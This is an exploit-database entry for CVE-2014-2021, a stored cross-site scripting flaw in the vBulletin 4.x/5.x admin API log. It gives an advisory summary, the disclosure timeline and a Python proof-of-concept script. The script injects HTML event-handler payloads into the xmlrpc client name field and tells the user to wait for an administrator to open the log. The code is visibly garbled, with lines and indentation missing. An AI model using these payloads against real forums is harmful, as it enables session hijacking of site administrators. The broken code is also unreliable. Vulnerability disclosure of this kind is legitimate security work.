vBulletin 4.x/5.x – AdminCP/ApiLog via xmlrpc API (Authenticated) Persistent Cross-Site Scripting

  • 作者: tintinweb
    日期: 2014-10-12
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/40114/
  • CVE-2014-2021 - vBulletin 5.x/4.x - persistent XSS in AdminCP/ApiLog via xmlrpc API (post-auth)
    	cvss:4.6 (AV:N/AC:H/Au:S/C:P/I:P/A:P) base
    	cwe :79 
    	vendor: vBulletin Solutions
    	product : vBulletin 4
    	versions affected :latest 4.x and 5.x (to date); verified <= 4.2.2; <= 5.0.x
    			* vBulletin 5.0.5	(verified)
    			* vBulletin 4.2.2 (verified)
    			* vBulletin 4.2.1 (verified)
    			* vBulletin 4.2.0 PL2 (verified)
    	exploitability :
    			* remotely exploitable
    			* requires authentication (apikey)
    			* requires non-default features to be enabled (API interface, API-Logging)
    			* requires user interaction to trigger exploit (admincp - admin views logs)
    	patch availability (to date) :None
    	vBulletin 4/5 does not properly sanitize client provided xmlrpc attributes (e.g. client name)
    allowing the remote xmlrpc client to inject code into the xmlrpc API logging page. 
    	Code is executed once an admin visits the API log page and clicks on the API clients name.
    	risk:rather low - due to the fact that you the api key is required
    		 you can probably use CVE-2014-2023 to obtain the api key
    	vulnerable component: 
    	apilog.php does not sanitize xmlrpc client provided data before passing it to
    	print_label_row to generate the output page.
    Proof of Concept (PoC)
    	see https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2021
    	1) prerequisites
    	1.1) enable API, generate API-key
    		 logon to AdminCP
    		 goto "vBulletin API"->"API-Key" and enable the API interface, generate key
    		 goto "vBulletin API"->"API-Log" and enable all API logging
    	2) run PoC
    		 edit PoC to match your TARGET, APIKEY (, optionally DEBUGLEVEL)
    		 run PoC, wait for SUCCESS! message
    	3) trigger exploit
    	 logon to AdminCP
    		 goto "vBulletin API"->"API-Log" and hit "view"
    		 in search results click on "client name"
    		 the injected msgbox pops up
    	2014-01-14: initial vendor contact - no reply
    	2014-01-24: vendor contact - no reply
    	2014-10-13: public disclosure
    	tintinweb - https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2021
    - - - 
    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    @author: tintinweb 0x721427D8
    import urllib2, cookielib, urllib, json, hashlib
    class Exploit(object):
    baseurl = None
    cookies = None
    def __init__(self,baseurl,params, debuglevel=1):
    self.cookies = cookielib.LWPCookieJar()
    handlers = [
    self.browser = urllib2.build_opener(*handlers)
    self.params = params
    def call(self,path="",data={}):
    data = urllib.urlencode(data)
    req = urllib2.Request("%s%s"%(self.baseurl,path),data)
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    return self.browser.open(req)
    def call_json(self,path=None,data={}):
    print "raw_response", x
    resp =json.loads(x)
    except urllib2.HTTPError, he:
    resp = he.read()
    return resp
    def vb_init_api(self):
    params = {'api_m':'api_init'}
    data = self.call_json("?%s"%(urllib.urlencode(params)))
    self.session = data
    return data
    def vb_call(self, params):
    api_sig = self._vb_build_api_sig(params)
    req_params = self._vb_build_regstring(api_sig)
    data = self.call_json("?%s"%(urllib.urlencode(params)),data=params)
    if not isinstance(data, dict):
    return data
    if 'errormessage' in data['response'].keys():
    raise Exception(data)
    return data
    def _ksort(self, d):
    ret = []
    for key, value in [(k,d[k]) for k in sorted(d.keys())]:
    ret.append( "%s=%s"%(key,value))
    return "&".join(ret)
    def _ksort_urlencode(self, d):
    ret = []
    for key, value in [(k,d[k]) for k in sorted(d.keys())]:
    ret.append( urllib.urlencode({key:value}))
    return "&".join(ret)
    def _vb_build_api_sig(self, params):
    apikey = self.params['apikey']
    login_string = self._ksort_urlencode(params)
    access_token = str(self.session['apiaccesstoken'])
    client_id = str(self.session['apiclientid'])
    secret = str(self.session['secret'])
    return hashlib.md5(login_string+access_token+client_id+secret+apikey).hexdigest()
    def _vb_build_regstring(self, api_sig):
    params = {
    return params
    if __name__=="__main__":
    TARGET = "http://localhost:8008/sectest/vbulletin_5/api.php"
    APIKEY = "G4YvWVhp"
    DEBUGLEVEL = 0# 1 to enable request tracking
    print "vBulletin 5.x / 4.x - XSS in API"
    ### 1. XSS
    vbulletin: admincp => settings: options => vbulletin API and Mobile Application Options
    * enable vbulletin API = yes
    * enable API log = yes
    xss in:
    2)click on hex<video><source/**/onerror='alert(1)'>hex
    params = {'clientname':"hex<video><source/**/onerror='alert(/clientname_1/)'>hex1",
    print "[1 ] - xss - inject alert() to admincp"
    x = Exploit(baseurl=TARGET,params=params,debuglevel=DEBUGLEVEL)
    vars = x.vb_init_api()
    print vars
    $calls = array(
    'methods' => array(
    'login_login', 'api_init'
    'login_login' => array(
    'POST' => array(
    'vb_login_username' => 'admin',
    'vb_login_password' => 'password',
    'api_init' => array(
    'sessionhash' => '{session.dbsessionhash}'
    print "[*] GOT SESSIONHASH:",vars.get('sessionhash','<no-sessiohash>')
    calls = {'methods':['api_init'],
    # just a dummy call
    print "[ *] SUCCESS! - now make an admin visit %s/admincp/apilog.php?do=viewclient&apiclientid=%s to trigger the XSS :)"%("/".join(TARGET.split("/")[:-1]),vars['apiclientid'])
    print "-- quit --"